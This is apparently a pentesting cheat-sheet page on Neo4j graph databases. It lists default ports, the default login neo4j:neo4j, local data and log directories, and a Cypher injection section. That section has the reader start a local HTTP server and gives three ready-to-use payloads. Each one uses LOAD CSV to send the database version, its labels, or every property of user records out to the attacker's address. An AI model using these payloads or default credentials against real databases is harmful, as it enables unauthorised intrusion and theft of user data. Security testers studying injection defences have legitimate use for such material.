Neo4j Pentesting

Last modified: 2023-04-27

Database Privilege Escalation

Neo4j is a graph database management system developed by Neo4j. Default ports are 6362 (Backup), 7474 (HTTP), 7473 (HTTPS), 7687 (Bolt).

Default Credentials

neo4j:neo4j

Common Directories & Files in Local System

/var/lib/neo4j
/var/log/neo4j

Cypher Injection

Before injecting payloads, we need to start local web server to fetch the result of the query.

sudo python3 -m http.server 80

Below are payloads.

In some payloads, replace 10.0.0.1 with your ip address.

<!-- Get Neo4j version -->
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.0.1/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

<!-- Get labels -->
' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://10.0.0.1/?label='+label as l RETURN 0 as _0 //

<!-- Get properties of the key -->
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.0.1/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

Neo4j Pentesting

Default Credentials

Common Directories & Files in Local System

Cypher Injection

References

ON THIS PAGE